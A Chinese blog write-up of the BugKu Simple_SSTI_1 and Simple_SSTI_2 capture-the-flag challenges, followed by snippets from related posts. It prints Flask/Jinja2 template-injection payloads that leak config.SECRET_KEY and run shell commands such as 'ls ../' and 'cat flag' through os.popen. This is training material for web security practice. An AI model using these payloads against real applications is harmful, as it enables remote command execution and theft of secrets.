BugKu:Simple_SSTI

最新推荐文章于 2024-07-30 22:00:59 发布
最新推荐文章于 2024-07-30 22:00:59 发布
阅读量160 收藏 3
点赞数 4
分类专栏: bugku 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63944205/article/details/140800589
版权

Simple_SSTI_1

1.这里告诉我们需要传一个flag的参数

2.我们f12查看这里提示我们

如图所示,我们会得到相关的提示,根据提示信息,我们利用flask的模板注入,就能直接得到flag。

3.这里我们利用flask的模板注入

/?flag={{config.SECRET_KEY}}

Simple_SSTI_2

1.这里我们看到需要我们注入一个flag参数

2.我们同样的去查看页面源代码

发现没什么可用信息

3.这里我们去传入flag查看config

http://114.67.175.224:10934/?flag={{config}}

发现页面很乱,不能得到有用信息

4.我们尝试SSTI模版注入

/?flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

我们看到了很多目录

5.我们依次读取目录看看\

/?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}

我们发现了flage目录,

6.我们查看flage

/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat flag').read() }}

我们发现了flag

丢了没
关注
专栏目录
BUGKU-simple_SSTI_1漏洞注入
kingx3的博客
10-08 329
SSTI全称Server side template injection.服务端模板注入这节课主要讲flask的模板注入.flask会把类似于 的变量当做参数来渲染并填充到web页面,如果该参数可控并被后台解析则有可能被注入恶意代码导致注入漏洞请注意 模板注入只会存在于二次渲染中,无二次渲染不会出现模板注入。
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2
记录笔记
04-22 973
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2 二级标题
BugkuSimple_SSTI_1
addlys的博客
03-08 407
根据题目的提示,flag很有可能在SECRET_KEY文件中,我一直卡在看不了SECRET_KEY文件,知道看大佬wp,才知道是config.SECRET_KEY格式
BugKu-Simple_SSTI_1
gaily123的博客
07-03 301
场景界面为提示,需要flag参数 postman,get请求带参数flag={{config.SECRET_KEY}}
BUGKU_Simple_SSTI_1
y17861077326的博客
06-05 812
查看网页源代码,发现提示: 与flask框架的 secret_key有关。 这个是模板注入的题,所以可以猜测思路是利用模板注入漏洞将secret_key变量的值回显到页面上。 如果没有才有猜到,那就利用payload先执行个ls命令看看根目录下有什么。 具体利用什么样的payload和为什么利用它见我的另一篇模板注入相关的笔记。 发现有这些文件 然后查看app文件夹里有什么 发现有app.py 有可能是源代码。 所以利用漏洞执行cat命令查看内容 根据红线,我们也可以知道,要想获取flag,就得获取 .
[bugku]Simple_SSTI_1
ZhShy
03-10 332
题目: 进入页面先按F12 有个提示secret_key 考虑模板注入 输入url: http://114.67.175.224:10472/?flag={{config}} 直接找到了flag 如果访问 http://114.67.175.224:10472/?flag={{config.SECRET_KEY}} 可以直接显示flag
BugKu CTF之 Simple_SSTI_2
weixin_42557264的博客
09-16 1938
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
Bugku web Simple_SSTI_2 wp
Whaocai的博客
08-05 652
考点: ①SSTI注入 最近学了学python ssti注入,找一道题练习练习。 进去之后,提示我们有个flag参数,同时再用御剑扫一下发现没有别的页面。 结合题目,直接payload:?flag={{1+1}},用的是flask模板 jinja2引擎 常见的ssti构造payload思路是: 这道题比较简单,什么敏感关键词都没有过滤 ...
BugkuWebSimple_SSTI_2
Light_inthe_eyes的博客
11-04 263
题目提示就很明显了是模板注入 flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} flag={{config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }} flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read
BUGKU-WEB Simple_SSTI_1
天泽岁月
02-04 2329
BUGKU 第02题
BugkuWebSimple_SSTI_1
Pai_Space
10-22 140
1. 进入场景得到 需要在指定标记的参数flag中通过 查看源代码 发现提示 将flask中的SECRET_KEY注入 得到flag
Bugku-Web篇:Simple_SSTI_1
最新发布
2301_76631050的博客
07-30 181
模板,config是flask模板中的一个全局对象。包含了所有应用程序的配置值。1.很简单的模板注入,直接f12查看源代码。2.这里了解了一下什么是模板注入。这里直接在url中写上。
bugku-web-Simple_SSTI_1
qq_51775369的博客
10-30 3029
.打开题目链接, 出现以下页面 提示需要传入一个名为flag的参数,题目又叫SSTI,从而得到了可以使用模板注入的基本条件 SSTI模板注入知识点:https://www.cnblogs.com/bmjoker/p/13508538.html 了解Jinjan2 基础语法 Jinja2模版语言,是不区分缩进的,和纯python不同。实际上所有模版语言都不区分缩紧。 常用标记: 注释:`{# 这是注释 #}` 变量:`{{ post.title }}`,或字典元素`{{your_d...
BugkuSimple_SSTI_1(小宇特详解)
小宇的web博客
06-17 2697
BugkuSimple_SSTI_1 1.很简单的模板注入,直接f12查看(这里有查看源码的快捷键ctrl+u) 2.这里了解了一下什么是模板注入 这里针对的是flask模板,config是flask模板中的一个全局对象。包含了所有应用程序的配置值。 这里直接在url中写上?flag={{config.SECRET_KEY}} ...
十八、bugku Simple_SSTI_1
山兔的博客
09-06 572
ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。 http://114.67.246.176:10828/?flag={{config}} ?flag={{config.SECRET_KEY}} {{}}是变量包裹标识符。{{}
bugku--Simple_SSTI_1---2
qq_51802152的博客
12-14 568
bugku--Simple_SSTI_1---2
BugKu-web篇-Simple_SSTI_1
jiuyongpinyin的博客
05-28 3137
BugKu-web篇-Simple_SSTI_1 网上很很多的writeup,发现描述的都不是很全面,本人也是菜鸡,写一下对于这道题的理解,首先web应先看题目,再看源码,源码里没提示再看其他东西。 回到这道题,先看题目 题目告诉我们要传入一个flag参数,我尝试了POST直接就报错了,所以选择个get的传入方式,然后看源码 提示我们在flask里,经常设置一个secret_key变量,这里就得讲一下了,首先是Jinjan2 基础语法 分为三种: {% … %} {{ … }} {# … #} ​
BugKuSimple_SSTISSTI模板注入)
热门推荐
m0_54082441的博客
05-01 1万+
1.签到题 这个题相当easy了,只要按照描述来做,便能得到flag,答案如下: flag{BugKu-Sec-pwn!} 2.Simple_SSTI_1(SSTI模板注入) 点击链接进入,题目说: You need pass in a parameter named flag。(你需要传入一个名为flag的参数)然后我们可以直接f12查看,也可以右击页面--->“检查” 如图所示,我们会得到相关的提示,根据提示信息,我们利用flask的模板注入,就能直接得到flag。
bugku simple_ssti_1
03-16
simple_ssti_1 是一道来自 Bugku 的简单 Server-Side Template Injection(SSTI)漏洞题目。 SSTI 漏洞通常发生在使用模板引擎时,攻击者可以利用这种漏洞执行任意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值